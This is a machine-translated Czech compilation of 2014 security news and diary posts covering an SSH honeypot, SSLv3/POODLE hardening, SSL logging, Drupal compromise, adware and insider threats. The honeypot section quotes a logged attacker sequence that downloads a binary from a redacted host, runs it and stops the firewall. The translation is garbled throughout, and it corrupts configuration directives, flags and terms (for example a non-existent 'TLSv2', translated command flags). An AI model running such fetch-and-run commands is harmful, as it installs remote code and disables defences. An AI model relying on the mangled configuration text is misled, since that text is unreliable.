Takže bezútěšný je stav point-of-prodeje cenného papíru, který US Secret Service vydaly poradenství v této věci na začátku tohoto roku . 2014 vydání Verizon dat Breach Investigation Report zahrnovala nelichotivý analýzu stavu point-of-prodeje bezpečnosti. Ve všech, společný konsensus je, že body-of-sale jsou špatně zabezpečené a čelí stále rostoucí-sofistikované útoky .
Honey Pot Entertainment - SSH 28.12.2014 Hrozby Vánoční období je příjemný čas hrát s některými lákadla a sdílet některé z informací, které byly sbírání. V současné době mám jen dvě funkce, a to jak z nich se nachází v USA. Každý dostane 20K nebo více pokusů o přihlášení za den. Jsem pomocí instalace standardní Kippo, běží jako non uživatel root a použití authbind spustit HoneyPot na portu 22. Výsledky jsou odesílány na protokolování serveru pro sběr.
Jeden z honeypots nemá platné heslo, takže je vždy selže, že jsem hlavně zájem o sbírání různé ID uživatele a hesla používá v pokusech tipovací. Druhý člověk má platné heslo a já pravidelně rozšiřovat své působení tím, že správné odpovědi využívající možnosti Kippo. Heslo lze změnit úpravou data / userdb.txt souboru v Kippo podadresáři. Interakce může být zlepšena tím, vydáním příkazu a zachycovat výstup a umístěním výsledný soubor v txtcmds adresáři. Například sftp je často první příkaz vydán. Vyhledejte kde je sftp běží od (obvykle / usr / bin). Vytvoření struktury pod honeyfs adresáři, např honeyfs / usr / bin / sftp . Vydat příkaz SFTP a zachytit výstup do souboru s názvem sftp a umístěte jej do txtcmds adresáři, stejnou strukturu tak txtcmds / usr / bin / SFTP . Nyní, když je zadán příkaz, že dostane odpověď, a doufejme, že budete mít další výsledky.
Takže některé statistiky za prosinec: Unikátní Hesla použít: 136029 Unikátní userids použít: 305 Unikátní Atatcking IP adresy: 343 Nejběžnější hádal heslo Nejčastější se jménem uživatele admin 1528 kořen 612564 123456 671 admin 13615 12344321 438 ubuntu 127 standardní 434 věštec 51 a1s2d3f4 433 test 41 kořen 430 ftpuser 31 q1w2e3 426 uživatel 29 qwer1234 422 podpora 28 111111 420 UBNT 26 1q2w3e4r5t 417 host 23 Místa
Nejšpinavější podsítí Níže jsou uvedeny / 24 podsítí, které jsou nejaktivnější s vysokým počtem počítačů ze stejné podsítě útočí.
103.41.124.0 - HK, CN - AS 63854 AS 4134 - https://isc.sans.edu/asreport.html?as=4134 122.225.109.0 - Huzhou, CN 122.225.97.0 - Huzhou , CN 122.225.103.0 - Huzhou , CN 218.2.0.0 - Nanjing, CN 222.186.34.0 - Nanjing , CN 61.174.50 - Huzhou , CN 61.175.51 - Huzhou , CN Na základě výše uvedených skutečností, že jsem docela dobře v tom, že blokování cokoli, co vzejde z AS4134 by nebyl špatný nápad.
Hesla Hesla použité v pokusech je velmi pestrá a sahají od jednoduché, jak je uvedeno výše, mnohem více esoterických a složitá hesla, jako je !! QAZ@@WSX ## EDC, !! Er.HAA22a098yIGH @ _Z @, % TGBVFR $ # EDCXSW @, WORLDEDU20121123.
Příkazy Vydáno ls - la / var / run / SFTP . PID # ! / bin / sh PATH = $ PATH : / usr / local / sbin : / usr / local / bin : / usr / sbin : / usr / bin : / sbin : / bin wget http : / / --- --- odstřihnout / nainstalovat / 8004 chmod + x 8004 . / 8004 uname servisní iptables zastavit
Došlo k určitému nárůstu snímání za poslední měsíc nebo tak nějak. Můj předchozí Honeypot run v srpnu 2014 by max při 1500 pokusů za den. Hlavním překvapením pro mě bylo, široká škála hesel používá. Řada z nich se zdá, že se přímo vztahují na konkrétní typy hardwaru nainstalovaného, jako je modem / router. Jiní vypadají jako docela robustní hesla a může pocházet z různých hesel kompromisů v letošním roce. Hlavním poselstvím je, že pokud používáte SSH server, že dostane napadl a vy byste možná nějaké slušné hesla a v ideálním případě použití ověřování certifikátů k zabezpečení serveru.
Chcete-li spustit svůj vlastní, já jsem fanoušek Kippo, to je jednoduché nastavení a existuje spousta příruček o tom, jak to udělat. Ujistěte se, že jste to běží na pole, které není výrobní zařízení a zajistěte jej. Nechcete, aby se stal představovat bod pro útoky.
Chcete-li, aby předložily své Kippo klády, Dr. J v tomto deníku https://isc.sans.edu/diary/New+Feature+Live+SSH+Brute+Force+Logs+and+New+Kippo+Client/18433 poskytuje perl, aby tak učinily.
České firmy o atacích na svou infrastrukturu často ani nevědí
19.12.2014 Hrozby Zářijový průzkum v České republice ukázal, že třetina tuzemských organizací byla v posledním roce napadená některým typem malwarového útoku. To jsou ale jen ty, které o ataku věděly.
O rok dříve to sice bylo 54 %, ale nejedná se o žádný pozitivní trend, protože překvapivě přes 40 % dotázaných v aktuální anketě nevědělo, jestli k podobnému úspěšnému útoku došlo, což ukazuje na určitou lhostejnost a výrazné podcenění rizik. Ztráty na pověsti i přímé náklady na odstranění škod mohou znamenat vysoké investice.
Podobná situace je i v oblasti počtu útoků. Zatímco v roce 2013 téměř polovina napadených firem (48 %) uvedla, že čelily 5 a více útokům za uplynulých 12 měsíců a 9 % dokonce zaznamenalo více než 50 útoků, při současném průzkumu více než polovina neuměla určit, kolik takových útoků bylo.
S nárůstem hrozeb v kombinaci se špatnou implementací bezpečnostních i analytických řešení může souviset nedostatečné vyhodnocování útoků a škod, protože je potom obtížnější vyhodnotit čas strávený opravami. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Malwarové útoky jsou stále důmyslnější a složitější. V roce 2013 uvedlo 34 % respondentů, že během 12 měsíců strávili 4 a více dnů opravami a obnovením systémů po útocích škodlivého kódu. Letošní průzkum potvrzuje poměrně zásadní neznalost vlastní sítě, téměř 40 % dotázaných nevědělo, kolik pracovních dnů za poslední rok strávili opravou a obnovou systémů po malwarovém útoku. Více než polovina odhaduje, že to bylo méně než 1 den.
Podobně jako v roce 2013 uvedli respondenti jako hlavní důvod úspěšnosti malwarových útoků nedostatek informací o bezpečnostní politice a postupech ze strany uživatelů.
Druhým nejčastějším důvodem jsou sofistikované metody malwarových útoků, které je těžké odhalit. Naopak nově je na třetím místě jako důvod úspěšnosti útoků větší množství zranitelností nultého dne, než jaké dokáží bezpečnostní řešení detekovat. Následují pokročilé techniky sociálního inženýrství a zvýšená aktivita uživatelů na sociálních sítích.
Podobně jako v roce 2013 uvedli respondenti jako hlavní důvod úspěšnosti malwarových útoků nedostatek informací o bezpečnostní politice a postupech ze strany uživatelů. Druhým nejčastějším důvodem jsou sofistikované metody malwarových útoků, které je těžké odhalit. Naopak nově je na třetím místě jako důvod úspěšnosti útoků větší množství zranitelností nultého dne, než jaké dokáží bezpečnostní řešení detekovat. Následují pokročilé techniky sociálního inženýrství a zvýšená aktivita uživatelů na sociálních sítích.
Jak budou vypadat sofistikované kyberútoky budoucnosti?
15.12.2014 Hrozby Seznam hlavní metod, které využívají tzv. APT ataky (Advanced Persistant Threat, pokročilé setrvávající hrozby), uveřejnil Kaspersky Lab.
Analýza vychází z podrobného rozboru více než 60 hrozeb po celém světě jako třeba RedOctober, Flame, NetTraveler, Miniduke, Epic Turla či Maska (Careto).
Nastupující hrozby z oblasti APT podle analytiků firmy Kaspersky :
Štěpení větších APT skupin – Rostoucí počet menších skupin povede k většímu množství napadených společností. Větší organizace budou čelit vyššímu počtu útoků od řady útočníků.
Útoky ve stylu APT v kybernetickém kriminálním světě – Dny, kdy se kyberkriminální gangy soustředily jen na krádež peněz od koncových uživatelů, jsou pryč. Zločinci nyní útočí přímo na banky. A k těmto komplexním útokům využívají techniky APT.
Cílení na top manažery v hotelových sítích – Hotely jsou ideálním místem k napadení vysoce postavených jednotlivců po celém světě. Jedním z nedávných příkladů podobného útoku byl Darkhotel.
Vyspělé techniky utajení – APT skupiny se budou stále více snažit zakrýt svou činnost a využijí daleko sofistikovanější metody k tomu, aby je nikdo neobjevil.
Nové metody sbírání dat – Útočníci budou v roce 2015 pravděpodobně využívat ve větší míře cloudové služby k neautorizovanému odebírání dat z počítačů, s cílem svou činnost utajit a ztížit odhalení.
Využití falešných stop – Skupiny APT dle předpovědí nastraží falešné stopy, které budou poukazovat při případném odhalení na jiné autory a skupiny.
Rizika vyplývající z IPv6? Nejsou nikterak malá
17.11.2014 Hrozby Při přechodu na IPv6 musí síťoví administrátoři zvážit rizika, která jim tento protokol může přinést. Přinášíme šest nejvýznamnějších.
Stále klesající počet IP adres ve verzi 4 (v severní Americe už od dubna dokonce museli přejít na tzv. krizový režim) vede k tomu, že organizace musejí začít brát zavádění IPv6 velmi vážně. Pakety IPv6 začínají běžně putovat sítěmi, síťoví inženýři ale musejí být stále velmi opatrní z důvodu přetrvávajících problémů se zabezpečením.
Přinášíme informace o šesti hlavních bezpečnostních rizicích v oblasti bezpečnosti sítí IPv6, jak je vybrali členové komunity 95 tisíc síťových profesionálů sítě gogoNet.
Nedostatek školení a vzdělávání v oblasti bezpečnosti IPv6.
Největším současným rizikem je nedostatek bezpečnostních znalostí o protokolu IPv6. Podniky musejí investovat čas a peníze do školení pro zabezpečení IPv6 dříve, než budou tuto technologii nasazovat. Nebo se mohou rozhodnout riskovat problémy a vynakládat později více času a peněz na odstraňování nedostatků.
Zabezpečení sítě je účinnější, pokud se s ním počítá již ve fázi plánování namísto řešení až po nasazení. Není to oblast, kterou by bylo možné ošidit.
Podle Scotta Hogga, který napsal knihu o zabezpečení IPv6 a je i technologickým ředitelem společnosti Gtri, by „se všichni bezpečnostní odborníci měli naučit IPv6 už bezprostředně, protože organizace mají ve svých prostředích operační systémy schopné pracovat s IPv6 a ten bývá obvykle povolený.“
Nezvládnutí zabezpečení systémů IPv6 je stejné jako umožnit existenci obrovských zadních vrátek, tvrdí Hogg.
Obcházení bezpečnostních zařízení pomocí nefiltrovaných a tunelovaných přenosů IPv6.
Nedostatek znalostí je větší riziko než samotné bezpečnostní produkty. Koncepčně je to jednoduché, zabezpečovací produkty musí dělat dvě věci -- rozpoznat podezřelé pakety IPv6 a dělat příslušnou kontrolu. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
V praxi je to však téměř nemožné i u samotného protokolu v4, takže prostředí může obsahovat škodlivé nebo neznámé tunelované přenosy.
„Existuje šestnáct různých tunelovacích a přechodových metod, nemluvě o tunelování na vyšší vrstvě s využitím SSH, IPv4-IPSec, SSL/TLS a dokonce DNS,“ tvrdí Joe Klein, expert na kybernetické zabezpečení IPv6 Fora a hlavní kybernetický architekt společnosti Sra International. „Nejprve musíte vědět, co hledáte.“
V současné době používané bezpečnostní produkty, zejména ty, u kterých došlo ke konverzi z protokolu v4 na v6, nemusí být dostatečně vyzrálé, aby odpovídaly hrozbám, vůči kterým mají chránit.
3. Nedostatečná podpora IPv6 u poskytovatelů připojení k internetu a dodavatelů.
Důkladné testování bude zcela zásadní do doby, než se funkčnost a stabilita zabezpečení IPv6 dostane na stejnou úroveň jako u IPv4. Je potřeba navrhnout testovací síť a testovací plán pro testování veškerého vybavení -- zejména pro nové bezpečnostní technologie od dodavatelů.
Každá síť je jedinečná a vyžaduje jedinečný testovací plán, ale na webech lze najít určitou pomoc.
Situaci může dále komplikovat neexistence nativního připojení IPv6 od poskytovatele přístupu k internetu. Tunel připojený k vašemu rozhraní dále zvyšuje složitost zabezpečení a vytváří prostor pro útoky typu MITM (man-in-the-middle, člověk uprostřed) a DoS (denial-of-service, odepření služby).
Nebezpečné bezkontaktní karty Visa
12.11.2014 Hrozby Experti z Newcastle University ve Velké Británii objevili způsob, jak kvůli bezpečnostní chybě u bezkontaktních platebních karet Visa, ukrást cizím lidem během několika sekund až miliony korun.
Bezkontaktní platební karty používají k bezpečným transakcím, při nichž není třeba vkládat kartu do speciální čtečky, kryptoprocesor a technologii RFID. Jako platební kartu lze v dnešní době použít také mobilní zařízení podporující technologii NFC.
V závislosti na zemi však existují různá omezení. Například ve Velké Británii lze pomocí bezkontaktních platebních karet bez nutnosti zadávat PIN kód provést transakce do dvaceti liber (700 Kč), přičemž v České republice bývá limit typicky nastaven na 500 Kč.
Podle nově zveřejněných informací však hackeři mohou díky zneužití chyby v platebním protokolu z cizí bezkontaktní karty na vlastní platební účet převést až 999,999,99 dolarů, tedy v přepočtu přes dvacet milionů korun.
Experti zveřejnili podrobnosti o možném útoku ve středu na konferenci ACM Conference on Computer and Communications Security. Celý útok je založen na podvodném terminálu běžícím na mobilním zařízení, který může být přednastaven na přijetí vysokého finančního obnosu - maximálně již zmíněných 999,999,99 dolarů v jakékoli měně.
„S pouhým jedním mobilním telefonem jsme vytvořili simulaci terminálu, který uměl číst karty umístěné v peněžence jejich vlastníka,“ uvedl hlavní expert z Newcastle University, který na projektu pracoval, Martin Emms. „Všechny bezpečnostní kontroly jsou prováděny na samotné kartě, nikoli na terminálu, takže v průběhu transakce neexistuje nic, co by mohlo vzbudit nějaké podezření.“
„Stačí přednastavit obnos, který chcete převést a následně přejet svým telefonem okolo peněženky cizího člověka a transakce se provede. V našich testech trvalo schválení celé transakce méně než jednu sekundu,“ dodal Emms s poukazem na to, že netestovali, jak budou bezpečnostní systémy Visy reagovat na náhlé platby přicházející v cizí měně a zda budou označeny za podvodné.
I když by systémy Visy podvodné transakce vyšších obnosů pravděpodobně zachytily, podle expertů by zločinci bezpečností opatření nejspíše obešli provedením stovek tisíc podvodných transakcí v menších částkách.
„V našem výzkumu jsme objevili opravdovou díru v platebním protokolu, kterou útočníci jistě uvítají,“ řekl Emms.
Visa Europe v prohlášení pro BBC uvedla, že „zjištění (expertů z univerzity v Newcastlu) byla prověřena“ a výzkum „nebere v potaz několik vstev zabezpečení, které jsou v našem systému integrovány“. Mluvčí společnosti pak dodal, že „tento typ transakce by mimo zkušební prostředí v laboratořích univerzity bylo velmi těžké provést“.
Visa Europe navíc údajně v současné době pracuje na úpravě svého bezpečnostního systému tak, aby více transakcí platebních karet bylo autorizováno online, díky čemuž by popsaný útok v budoucnu bylo ještě těžší provést.
Zmatek nad bitovými klíči SSL a 1024
10.11.2014 Hrozby Včera a dnes, příspěvek na reddit.org způsobila docela dost nejistoty ohledně bezpečnosti 1024 bit RSA klíčů, pokud jsou použity s OpenSSL. Minulost odkázal na prezentaci dané na kryptografie konferenci s tím, že 1024 bitové SSL klíče mohou být zapracovány s mírnými prostředky ("20 minut na notebook"). To bylo navrhl, že to je alespoň z části kvůli chybě v OpenSSL, která podle postu nepodá náhodné klíče z celého dostupného prostoru.
Vypadá to spíš jako tvrzeními v prezentaci nejsou pravdivé, nebo alespoň ne tak rozšířeno podle.
Nicméně, to neznamená, že byste se měli vrátit k použití 1024 bitové klíče. 1024 bitové klíče jsou považovány za slabé, a odhaduje se, že 1024 klíče budou rozděleny snadno v blízké budoucnosti vzhledem k pokroku v oblasti výpočetní techniky, a to i pokud je nalezen žádný Výraznou slabinou algoritmu RSA a jeho provedení. NIST doporučují vyřazování 1024 bitové klíče na konci loňského roku.
Tak co byste měli dělat?
- Stop vytváření nových 1024 bitové RSA klíče. Prohlížeče začne považovat je za neplatné, a mnoho dalších softwarových komponent tak již činí, nebo budou brzy následovat vedení prohlížeče (nemyslím si, že by hlavní CA podepíše 1024 bitové klíče v tomto bodě) - Soupis stávajících 1024 bitové klíče, které máte, a zvažte jejich výměnu.
Tam mohou být některé odpůrce. Vestavěné systémy (znovu) někdy nelze vytvořit klíče větší než 1024 bitů. V tomto případě je třeba se podívat do jiných ovládacích prvků.
S cryptograph obecně použít největší velikost klíče si můžete dovolit, SSL, jsou možnosti pro RSA klíče jsou typicky 2048 a 4096 bitů. Pokud je to možné, má 4096 bitů.
10.11.2014 Hrozby Než začnete: Při nastavování konfigurace SSL, měli byste také zkontrolovat pro různé jiné SSL souvisejících možností konfigurace. Dobrý obrys, lze nalézt na http://bettercrypto.org i na http://ssllabs.com (pro webové servery, zejména)
Zde jsou některé konfigurační direktivy Chcete-li vypnout podporu SSLv3 na serverech:
Apache: Přidat -SSLv3 na "SSLProtocol" linky. To by již měl obsahovat -SSLv2 pokud uvedete konkrétní protokoly.
Nginx: seznam konkrétních povoleno protokoly v "ssl_protocols" linky. Ujistěte se, že SSLv2 a SSLv3 není uveden. Například: ssl_protocols TLSv2 TLSv1.1 TLSv1.2;
Dovecot: podobné, zakázat SSLv2 a SSLv3 v ssl_protocols řádku. SSLv3 ssl_protocols = SSLv2: například!
HAProxy Server: Konfigurace bind řádek by měl obsahovat ne-SSLv3 (tento řádek také uvádí povolené šifry)
loutka: viz https://github.com/stephenrjohnson/puppetmodule/commit/1adb73f9a400cb5e91c4ece1c6166fd63004f448 pokyny
Pro klienty, vypnutí SSLv3 může být trochu složitější, nebo prostě nemožné.
Google Chrome: je třeba začít Google Chrome s "--ssl-verze-min = TLS1" možnost volby.
Internet Explorer: můžete vypnout podporu SSLv3 v rozšířeném dialogu možnost internet.
Firefox: zkontrolovat "security.tls.version.min" nastavení v about: config a nastavte ji na 1. Kupodivu, v našem testování, výchozí nastavení 0 umožní SSLv3 připojení, ale odmítá se připojit k našemu serveru pouze SSLv3 ,
Pro Microsoft Windows, můžete použít zásady skupiny. Podrobnosti viz poradenství společnosti Microsoft: https://technet.microsoft.com/en-us/library/security/3009008.aspx
Chcete-li otestovat, nadále používat naši stránku "PUDL Test" na https://poodletest.com nebo stránku QUALYS SSLLabs na https://ssllabs.com
Chcete-li zjistit využití SSLv3, můžete zkusit následující filtry:
tcpdump filtr: (1), která tvoří variabilní TCP Length: "tcp [((tcp [12] >> 4) * 4) 9: 2] = 0x0300" (2), za předpokladu, že délka záhlaví TCP 20: "tcp [29: 2] = 0x0300 '
Budeme mít také speciální webcast na patnáct hodin ET. Pro podrobnosti viz
https://www.sans.org/webcasts/about-poodle-99032
On-line přenos bude pravděpodobně trvat 20-30 minuty a shrnout upozorní na to, co zatím víme.
Logování SSL 10.11.2014 Hrozby
S pudl "za námi", je čas se připravit na příští SSL požární cvičení. Jednou z otázek, které stále přicházejí, je, které šifry a verze SSL / TLS jsou skutečně používány. Pokud se rozhodnete vypnout SSLv3, nebo ne, závisí hodně na to, kdo ji potřebuje, a to je důležité, odpověď mít připraven by měl zítra nějaký jiný kód se ukáže, že je příliš slabý.
Ale mějte na paměti, že to není jen čísla, která záleží. Také je potřeba zjistit, kdo jsou odlehlé hodnoty a jak důležité (nebo nebezpečné?) Jsou. Tak jako dobrý začátek, zkuste se přijít na to, jak se přihlásit SSL / TLS verze a šifry. Existuje několik možností, jak toho dosáhnout:
V Apache, můžete se přihlásit na verzi protokolu a šifru snadno přihlášení příslušnou proměnnou prostředí [1]. Například: CustomLog logs / ssl_request_log "% t% h \" {User-agent} i \ "% {SSL_PROTOCOL} x {% SSL_CIPHER} x"
Protokoly SSL protokol a kód. Můžete přidávat obsah ke stávajícímu protokolu přístupů, nebo vytvořit nový protokol. Rozhodnete-li se přihlásit do své vlastní protokolu, doporučuji vám přidat User-Agent a IP adresy (stejně jako časové razítko).
V Nginx, můžete udělat totéž přidáním $ ssl_cipher $ ssl_protocol směrnice o log_format v konfiguraci Nginx. Například:
Máte-li paket sniffer na místě, můžete také použít tshark extrahovat data. S t-žralok, můžete skutečně dostat kousek dál. Můžete se přihlásit do klientského pozdrav s tím, co šifry navrhované klient a server Dobrý den, v němž uvede, co šifra server vybral.
tshark -r ssl -2R "ssl.handshake.type == 2 nebo ssl.handshake.type == 1 '-T pole -e ssl.handshake.type -e ssl.record.version -e ssl.handshake.version - e ssl.handshake.ciphersuite
Pro "kreditu navíc" log název hostitele požadované v klientském ahoj pomocí SNI a porovnat jej s skutečném názvu hostitele klient připojí k.
Nyní si můžete nejen sbírat "skutečné údaje", do jaké šifry jsou potřeba, ale můžete se také podívat na anomálie. Například user agent to, že žádost velmi odlišné kódy pak další spojení, která tvrdí, že pocházejí ze stejného uživatelského agenta. Nebo kdo žádá o slabých šifer? Možná, že to znamení pro downgrade útoku SSL? Nebo útok používání nástroje a starší SSL knihovny ...
10.11.2014 Hrozby Chtěl jsem hrát trochu nevědecké shromažďování informací, já pracuji s malou skupinou, která si myslí, že se zaměřuje konkrétně na ty, zatímco já myslím, že je rozšířenější a opportunitistic. Pokud jste v nedávné době obdrželi tyto sondy e-maily, žádný obsah, nebo zprávu, jednoduchý "HI", zašlete prosím jednoduchý komentář níže v tomto formátu:
Průmysl Pořadí magnitued velikosti ( např <10, <100 <1000) Odesílání domény Neváhejte využít naše komentáře stránku přidat další komentář analýzu zde: https://isc.sans.edu/contact.html
Báječný svět CMS udeří znovu 10.11.2014 Hrozby
Myslím, že začnu tento deník s následujícím prohlášením:
Pokud používáte open source CMS, a nechcete aktualizovat často, je zde velmi vysoká šance, že vaše webové stránky, pokud nejen ohrožena, ale také součástí botnetu.
Pravděpodobně jste již viděli několik našich deníků s uvedením zranitelností ve velmi známých CMS systémů, jako je WordPress a Joomla, které jsou velmi výkonné a snadno použitelné / install, a také plný zranitelností a vyžaduje časté aktualizace.
Třetí v tomto seznamu je Drupal. Zmínili jsme se minulý týden na našich podcast o kritické zranitelnosti pevné vývojáři, a dnes vydali "veřejné oznámení" ve vztahu k této zranitelnosti. A to je děsivé (ano, Halloween slovní hříčka ...).
PSA uvádí, že během několika hodin od Patch oznámení, bylo již několik automatizovaných útoků hledají pro SQL injection zranitelnosti v implementacích Drupal.
Jako náš čtenář Gebhard poznamenal, že je velmi zajímavé citace v PSA:
"Měli byste pokračovat za předpokladu, že každý Drupal 7 webových stránek byla ohrožena, pokud není aktualizován nebo oprava do 15 října, dvacet tři hodin UTC, že je 7 hodin po oznámení"
To znamená, že nyní, i když aktualizovaný server, tam je velmi vysoká šance, že váš server je nyní součástí botnetu ... takže, pokud máte webové stránky s Drupalu, bych vřele doporučuji sekci vymáhání PSA dokument.
Proč je váš Mac vše pro náhlé pomocí Bing jako vyhledávač? 3.10.2014 Hrozby Dokonce i jako uživatel Mac, možná jste slyšeli o Bing, alespoň můžete vidět prokázal v reklamě. [1] Ale pokud váš výchozí vyhledávač na vašem počítači Mac je vše na náhle přešel na Bing, může to být způsobeno jiným kusem software dědictví, že někteří uživatelé Mac mohou mít pevný čas žít bez: Microsoft Internet Explorer. Tak proč ne jen hledat ("Google"), pokud je verze pro OSX:
Google vyhledávání pro "mac Internet Explorer"
Opravdu, tam je ZDARMA! Internet Explorer pro Mac k dispozici. Umožňuje stáhnout, a uvidíme, co se stane.
Jak to dopadá, stránka, kterou se chystáte ke stažení (obvyklý soubor .dmg), je podepsán platným Apple vývojáře podpisu. To bude instalovat v pořádku s výchozím nastavením "Strážní" Maverick je. Při instalaci nabízí pár další produkt zdarma. "Nákupní a Search Helper", stejně jako nějaký software, který vyčistí váš Mac a dělat to rychlejší a bezpečnější.
V některých ohledech, musím říct, že obdivuji, jak upřímný hledání optimizer je ve své EULA. Software bude (původní využívá všechny horní pouzdro pro tuto sekci, stejně jako je uvedeno níže):
.. RESET vaše domovská stránka A / NEBO výchozí vyhledávač pro Internet Explorer, Firefox a Chrome TROVI HLEDÁNÍ ...
BLOCK ... a upozorní vás pokusů jiným softwarem pro změnu VYBRANÉ ÚVODNÍ STRANA A / NEBO výchozí vyhledávání ...
Zásady ochrany osobních údajů Trovi je podobně explicitní, a neskrýval moštu. Tento software bude shromažďovat kromě jiného [2]:
IP adresa a zařízení identifikátory jako UDID webové stránky, které navštívíte, a obsah, který vidíte, přístup a využití ... interakce na sociálních sítích Informace o registraci, které poskytnete, jako jméno, adresu, e-mail, telefonní číslo, pohlaví narozeninám Na konci, můžete skončit s partou adware a vykazuje skutečný důvěryhodně verzi aplikace Internet Explorer 5, který slouží ke spuštění na Mac OS, ale ve skutečnosti běží na OS X Mavericks.
Pro úplný procházku zobrazení tohoto videa YouTube: https://www.youtube.com/watch?v=bVwyxaYJgKY
Stručně řečeno: Nemyslím si, že tento software dělá něco nedovoleného. To jasně inzeruje, co dělá. Pokud máte pocit, jinak, můžete podat stížnost u soudu na Kypru, kde se společnost nachází.
CSAM: My Storage Array SSHs Outbound! 3.10.2014 Hrozby Kuddos Matouše pro věnování pozornosti výstupního provozu. Neustále zdůrazňovat, jak důležité je, aby ujistěte se, že systémy mluvit "odchozí" bez povolení. Právě tento minulý týden, různé Shellshock využije udělal jen, že: Otočte zařízení do IRC klientů nebo stahování dalších nástrojů přes HTTP, nebo jen zaznamenávají úspěch přes jednoduchý ping.
Není tedy divu, že Matouš nám napsal: " ... poprvé jsem viděl na diskové pole SSH na internetu jsem o omdlel ... ".
Byl bych překvapen, taky! A ukázalo se, že není jediný člověk, který zažil to. Mark poznamenal:
"Kdyby se zdá podivný okamžik, kdy jsem viděl, se to stalo. SAN šťastně komunikaci s vnějším subjektem. Přestože společnost byla dobře a opravdově hosed."
Naštěstí, než se příliš daleko do jízdní vlastnosti události, Matthew si uvědomil, že to byl falešný poplach. Diskové pole v otázce s názvem "domů" na dodavatele, aby zprávy o jeho stavu. Účelem tohoto sdělení je informovat neúspěšné disky nebo jiné kritické události, které mohou vyvolat do servisu. Prodejci budou souhlasit, aby tuto funkci vypnout, ale pak je samozřejmě na vás, abyste rozpoznat vadné disky.
Máš něco takového? Dejte nám vědět . (Je-li to možné s log úryvek / zachycování paketů nebo jiné výstavy-and-říká)
FBI varuje před nebezpečným zasvěcených hrozby zvýšení 3.10.2014 Hrozby FBI a DHS vydaly varování pro podniky o zvýšení bezpečnostních incidentů zahrnujících nebezpečné zasvěceným (současné nebo bývalé zaměstnance, dodavatele nebo jiné obchodní partneři). "vykořisťování obchodních sítí a serverů nespokojeným a / nebo bývalých zaměstnanců má za následek v několika významných vyšetřování FBI, ve kterém jednotlivci používají jejich přístup ke zničení dat, krást proprietární software, získávat informace o zákaznících, kupte nepovolené zboží a služby pomocí klientských účtů a získat konkurenční výhodu na nové společnosti, "uvedly. "odcizení chráněné informace v mnoha z těchto incidentů byl usnadněn pomocí webových úložišť cloud, jako Dropbox a osobních e-mailových účtů. V mnoha případech ukončena zaměstnanci pokračoval přístup k počítačovým sítím prostřednictvím instalace neoprávněného Remote Desktop Protocol software . Instalace tohoto softwaru došlo před opuštěním společnost. " Tam také byli několik vydírání pokusů, kdy nespokojení či bývalí zaměstnanci se pokusili vydírat peníze od svého zaměstnavatele úpravou a omezení přístupu k webům společnosti, vypnout funkce systému pro správu obsahu, a provádění DDoS útoky. Předsednictvo bere na vědomí, že bezpečnostní incidenty týkající se zasvěcenými může stát společnosti hodně peněz, a mají společnou sadu doporučení pro předcházení takovým incidentům zabránit ve své organizaci. Patří mezi ně ukončení přístupu zaměstnanců na účty, které nepotřebují přístup k, končit účty zaměstnanců nebo dodavatelé "okamžitě propuštěn, jakékoliv změny hesla pro správu znaly, brání zaměstnancům v přístupu k ukládání dat mrak webové stránky a stahování neoprávněný vzdálený přihlašovací aplikace na firemních počítačích, a další .
Skutečnosti snižující závažnost rizika pro Spike DDoS toolkit-poháněl útoky 2.10.2014 Hrozby Akamai Technologies vydala přes Prolexic Security Engineering & Response Team (PLXsert), nové kybernetické hrozby poradenství, které upozorní podniky k ohrožení s vysokým rizikem silného distribuované odmítnutí služby (DDoS) útoky společnosti od Spike DDoS Toolkit. Díky této výbavy, škodlivé herci budování větších DDoS botnety zaměřením širší škálu internetových schopné zařízení. multi-vektor toolkit můžete spustit založená na infrastruktuře a DDoS aplikace založené na užitečné zatížení. Útoky jsou SYN Flood, UDP Flood, Domain Name System (DNS) Dotaz povodní, a získat záplavy. Některé kampaně byly hlášeny proti hostiteli v Asii a ve Spojených státech. DDoS útok kampaně zahájené z botnetu byly cílené zákazníky Akamai. Jeden DDoS útok kampaň zmírnit společnost dosáhla vrcholu 215 gigabitů za sekundu (Gb) a 150 milionů paketů za sekundu (Mp). Spike DDoS nástrojů běží na systému Windows, ale může komunikovat a provádět příkazy pro Windows, Linux a ARM založené zařízení nakažený s binárními užitečné zatížení. Schopnost vytvářet ARM založené na binární náklad naznačuje, že autoři tohoto škodlivého nástroj se snaží ovládat zařízení jako jsou routery a internet věcí (internet věcí) zařízení (tj inteligentní termostat systémů a pračka / sušičky). Schopnost infikovat a kontrolovat širší škálu zařízení, by mohla umožnit DDoS útočníkům šíření botnetů v post-PC éry. Most DDoS infrastruktury útoky zahajované Spike DDoS Toolkit lze zmírnit zavedením seznamy řízení přístupu (ACL), že filtr se nežádoucí provoz. Pro zmírnění proti Toolkit je na aplikační vrstvě GET povodněmi útoku PLXsert produkoval podpis Snort, který je k dispozici v poradenství hrozeb. multiplatformní infekce kód v této soupravě se zvyšuje složitost hrozbu, a sofistikovanost a je nezbytné aplikovat systém tvrdnutí opatření ke každému z cílových operačních systémů a platforem. Odkazy na průmyslových doporučených kalení techniky jsou poskytovány na správce systému v poradenství. Poradní také pravidlo YARA identifikovat Bot užitečné zatížení používané infikovat zařízení a učinit je součástí botnetu. PLXsert očekává další napadení a rozšíření tohoto DDoS botnetu. poradenství (nutná registrace) také obsahuje následující informace:
Ukazatele binární infekce Command a ovládací panel Variace Toolkit Inicializace Bot DDoS užitečná zatížení Podrobnosti pozorované útoku kampaně Zmírnění DDoS Systém kalení zdroje.
Bezpečnost Onion news: Bylo aktualizováno zjišťování skripty Shellshock pro Bro 2.10.2014 Hrozby Za jeden cenný papír cibule je Doug Burks , Seth Hall vyvinula některé komplexní detekční skripty Shellshock pro Bro. Tyto skripty "odhalit úspěšné využití zranitelnosti Bash s CVE-2014-6271 přezdíval" ShellShock "a jsou více komplexní než většina zjištěných v tom, že jsou číhající na chování z napadeného počítače, které by mohly signalizovat úspěšný kompromis, nebo skutečné chyby. " Seth byl aktualizován tyto skripty dnes znovu na "Přidat shellscripts jako post-využití mechanismu detekce." Doug aktualizovala balíček securityonion-bro-skripty, aby se tato změny a také aktualizovaný balíček securityonion-web-stránek zahrnout některé ELSA dotazy pro "Shellshock využije" a "Shellshock skenery".
